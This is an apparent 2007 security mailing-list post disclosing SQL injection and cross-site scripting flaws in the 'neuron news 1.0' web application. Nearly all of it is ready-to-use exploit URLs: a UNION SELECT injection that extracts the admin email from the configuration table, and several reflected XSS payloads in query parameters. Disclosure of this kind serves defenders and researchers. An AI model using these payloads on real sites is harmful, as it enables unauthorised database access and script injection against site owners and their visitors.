neuron news1.0 Multiple Remote Vulnerabilities (sql injection/xss) Dec 16 2007 11:13PM
hadihadi_zedehal_2006 yahoo com


####################################################################

# #

# ...:::::neuron news1.0 Multiple Remote Vulnerabilities::::.... #

# (sql injection/xss) #

####################################################################

Virangar Security Team

www.virangar.org

www.virangar.net

--------

Discoverd By : virangar security team

(hadihadi & black.shadowes)

---------------------------------

special tnx to:MR.nosrati,MR.hesy,satan,Zahra

& all virangar members & all iranian hackerz

greetz:to my best friend in the world hadi_aryaie2004

------------------------------------

vlues:

1.sql injection:

http://site.com/patch/?q='/**/union/**/select/**/1,2,adminmail,4,id/**/f
rom/**/neuronnews_configuration/*

########################

2.xss:

http://site.com/patch/?q=viewtopic&topic=<script>alert(111111)</script>

http://site.com/patch/?q=newsarchive&newsyear=<script>alert(111111)</scr
ipt>

http://site.com/patch/?q=newsarchive&newsyear=<script>alert(111111)</scr
ipt>&newsmonth=<script>alert(111111)</script>

########################

g00d l0uck

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus